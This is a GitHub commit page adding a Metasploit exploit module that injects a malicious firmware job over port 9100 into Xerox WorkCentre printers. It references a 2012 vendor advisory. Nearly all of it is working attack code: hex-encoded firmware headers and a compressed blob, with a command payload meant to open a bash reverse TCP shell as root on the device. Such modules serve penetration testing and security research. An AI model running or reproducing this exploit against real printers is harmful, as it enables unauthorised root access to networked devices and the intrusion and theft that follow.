Skip to content

Commit 9021e4d

Browse files
percxpercx
committed
Xerox Workcentre firmware injection exploit
1 parent 0d449cb commit 9021e4d

File tree

1 file changed

+114
-0
lines changed

1 file changed

+114
-0
lines changed

modules/exploits/unix/misc/xerox_mfp.rb

Lines changed: 114 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,114 @@
1+
##
2+
# This module requires Metasploit: http//metasploit.com/download
3+
# Current source: https://github.com/rapid7/metasploit-framework
4+
##
5+
6+
require 'msf/core'
7+
8+
class Metasploit3 < Msf::Exploit::Remote
9+
Rank = GoodRanking
10+
include Msf::Exploit::Remote::Tcp
11+
12+
def initialize(info = {})
13+
super(update_info(info,
14+
'Name' => 'Xerox reverse shell',
15+
'Description' => %{This module will execute commands with root priviages on Xerox Workcentre.},
16+
'Author' =>
17+
[
18+
'Deral "Percentx" Heiland',
19+
'Pete "Bokojan" Arzamendi'
20+
],
21+
'References' =>
22+
[
23+
['BID', '52483'],
24+
['URL', 'http://www.xerox.com/download/security/security-bulletin/1284332-2ddc5-4baa79b70ac40/cert_XRX12-003_v1.1.pdf'],
25+
['URL', 'http://foofus.net/goons/percx/Xerox_hack.pdf']
26+
],
27+
'Privileged' => true,
28+
'License' => MSF_LICENSE,
29+
'Payload' =>
30+
{
31+
'DisableNops' => true,
32+
'Space' => 512,
33+
'Compat' =>
34+
{
35+
'PayloadType' => 'cmd cmd_bash',
36+
'RequiredCmd' => 'generic bash-tcp'
37+
}
38+
},
39+
'Platform' => ['unix'],
40+
'Arch' => ARCH_CMD,
41+
'Targets' => [['Automatic', {}]],
42+
'DisclosureDate' => 'March 07 2012',
43+
'DefaultTarget' => 0))
44+
45+
register_options(
46+
[
47+
Opt::RPORT(9100)
48+
], self.class)
49+
end
50+
51+
def exploit
52+
print_status("Sending print job to #{rhost} ")
53+
firmcode = "\x25\x25\x58\x52\x58\x62\x65\x67\x69\x6E\x0A\x25\x25\x4F\x49\x44"
54+
firmcode << "\x5F\x41\x54\x54\x5F\x4A\x4F\x42\x5F\x54\x59\x50\x45\x20\x4F\x49"
55+
firmcode << "\x44\x5F\x56\x41\x4C\x5F\x4A\x4F\x42\x5F\x54\x59\x50\x45\x5F\x44"
56+
firmcode << "\x59\x4E\x41\x4D\x49\x43\x5F\x4C\x4F\x41\x44\x41\x42\x4C\x45\x5F"
57+
firmcode << "\x4D\x4F\x44\x55\x4C\x45\x0A\x25\x25\x4F\x49\x44\x5F\x41\x54\x54"
58+
firmcode << "\x5F\x4A\x4F\x42\x5F\x53\x43\x48\x45\x44\x55\x4C\x49\x4E\x47\x20"
59+
firmcode << "\x4F\x49\x44\x5F\x56\x41\x4C\x5F\x4A\x4F\x42\x5F\x53\x43\x48\x45"
60+
firmcode << "\x44\x55\x4C\x49\x4E\x47\x5F\x41\x46\x54\x45\x52\x5F\x43\x4F\x4D"
61+
firmcode << "\x50\x4C\x45\x54\x45\x0A\x25\x25\x4F\x49\x44\x5F\x41\x54\x54\x5F"
62+
firmcode << "\x4A\x4F\x42\x5F\x43\x4F\x4D\x4D\x45\x4E\x54\x20\x22\x50\x72\x61"
63+
firmcode << "\x65\x64\x61\x50\x57\x4E\x32\x30\x31\x34\x3A"
64+
firmcode << "#{payload.encoded}\x3A"
65+
firmcode << "\x22\x0A\x25\x25\x4F\x49\x44\x5F\x41\x54\x54\x5F\x4A\x4F\x42\x5F"
66+
firmcode << "\x43\x4F\x4D\x4D\x45\x4E\x54\x20\x22\x70\x61\x74\x63\x68\x20\x54"
67+
firmcode << "\x68\x75\x20\x4F\x63\x74\x20\x32\x33\x20\x31\x39\x3A\x31\x34\x3A"
68+
firmcode << "\x32\x34\x20\x45\x44\x54\x20\x32\x30\x31\x34\x22\x0A\x25\x25\x4F"
69+
firmcode << "\x49\x44\x5F\x41\x54\x54\x5F\x44\x4C\x4D\x5F\x4E\x41\x4D\x45\x20"
70+
firmcode << "\x22\x78\x65\x72\x6F\x78\x22\x0A\x25\x25\x4F\x49\x44\x5F\x41\x54"
71+
firmcode << "\x54\x5F\x44\x4C\x4D\x5F\x56\x45\x52\x53\x49\x4F\x4E\x20\x22\x4E"
72+
firmcode << "\x4F\x5F\x44\x4C\x4D\x5F\x56\x45\x52\x53\x49\x4F\x4E\x5F\x43\x48"
73+
firmcode << "\x45\x43\x4B\x22\x0A\x25\x25\x4F\x49\x44\x5F\x41\x54\x54\x5F\x44"
74+
firmcode << "\x4C\x4D\x5F\x53\x49\x47\x4E\x41\x54\x55\x52\x45\x20\x22\x63\x61"
75+
firmcode << "\x33\x36\x31\x30\x34\x37\x64\x61\x35\x36\x64\x62\x39\x64\x64\x38"
76+
firmcode << "\x31\x66\x65\x65\x36\x61\x32\x33\x66\x66\x38\x37\x35\x66\x61\x63"
77+
firmcode << "\x63\x33\x64\x66\x30\x65\x31\x31\x35\x33\x64\x33\x32\x35\x63\x32"
78+
firmcode << "\x64\x32\x31\x37\x63\x30\x65\x37\x35\x66\x38\x36\x31\x62\x22\x0A"
79+
firmcode << "\x25\x25\x4F\x49\x44\x5F\x41\x54\x54\x5F\x44\x4C\x4D\x5F\x45\x58"
80+
firmcode << "\x54\x52\x41\x43\x54\x49\x4F\x4E\x5F\x43\x52\x49\x54\x45\x52\x49"
81+
firmcode << "\x41\x20\x22\x65\x78\x74\x72\x61\x63\x74\x20\x2F\x74\x6D\x70\x2F"
82+
firmcode << "\x78\x65\x72\x6F\x78\x2E\x64\x6E\x6C\x64\x22\x0A\x25\x25\x58\x52"
83+
firmcode << "\x58\x65\x6E\x64\x0A\x1F\x8B\x08\x00\xB1\x8B\x49\x54\x00\x03\xED"
84+
firmcode << "\xD3\x41\x4B\xC3\x30\x14\x07\xF0\x9E\xFB\x29\xFE\xE2\x60\x20\x74"
85+
firmcode << "\x69\x63\x37\x61\x5A\xBC\x79\x94\xDD\x3C\xC8\xA0\x59\x9B\xDA\x4A"
86+
firmcode << "\xD7\xCC\xB4\xD3\x1D\xF6\xE1\x8D\xDD\x64\xB8\x83\x3B\x0D\x11\xFE"
87+
firmcode << "\xBF\x43\x03\xAF\x2F\xEF\xBD\xB4\x64\xA3\xAD\xD9\x8C\xDA\xD2\x3B"
88+
firmcode << "\xA3\xD0\xB9\x19\x8F\xFB\xD5\x39\x5E\xC3\x58\x4E\xBC\x48\xC6\x52"
89+
firmcode << "\x5E\x87\xE3\x89\x8C\xBD\x30\x8A\xE4\x44\x7A\x08\xCF\x39\xD4\xB7"
90+
firmcode << "\x75\xDB\x29\x0B\x78\xD6\x98\xEE\xB7\xBC\x53\xEF\xFF\xA9\xCB\x0B"
91+
firmcode << "\xB1\xA8\x1A\xB1\x50\x6D\xE9\x17\x55\x9D\xA4\x2F\x56\xAF\x10\xD4"
92+
firmcode << "\x08\x1E\x30\x9C\x59\xA5\x73\x35\x7B\x7A\x94\x61\x14\x0F\x21\xDE"
93+
firmcode << "\x95\x15\xED\xCA\x98\x5A\x34\x99\x68\x74\x27\x5E\xCD\x62\x7A\x35"
94+
firmcode << "\x8A\x52\xBF\x2A\xF0\x8C\xA0\xC0\xC0\xD5\xC0\xDC\xEF\x4A\xDD\xF8"
95+
firmcode << "\xC0\x47\x59\xD5\x1A\x56\xAB\x1C\x75\xD5\x68\x17\xC9\x8D\x7B\x00"
96+
firmcode << "\x3A\x2B\x0D\x06\x5F\x31\x6C\xB1\xEB\xF8\x06\xFC\x68\xD7\xE7\xF5"
97+
firmcode << "\x65\x07\xF7\x48\x12\x84\x98\xDF\x62\x5F\x17\xC8\xCC\x72\xA9\x9A"
98+
firmcode << "\x3C\x49\x0F\x95\xB6\xD9\xBA\x43\x90\x4F\xDD\x18\x32\xED\x93\x8A"
99+
firmcode << "\xAA\xEF\xE8\x9A\xDC\xF5\x83\xF9\xBB\xE4\xFD\xDE\xED\xE1\xE0\x76"
100+
firmcode << "\x89\x91\xD8\xEC\x6F\x82\xFB\x0C\xFE\x5F\xFF\x15\x22\x22\x22\x22"
101+
firmcode << "\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\x22\xA2\xD3\x3E"
102+
firmcode << "\x01\x5A\x18\x54\xBB\x00\x28\x00\x00"
103+
104+
begin
105+
connect(true, 'RPORT' => datastore['RPORT'].to_i)
106+
sock.put(firmcode)
107+
handler
108+
disconnect
109+
rescue
110+
print_error("Error connecting to #{rhost}")
111+
return
112+
end
113+
end
114+
end

0 commit comments

Comments
 (0)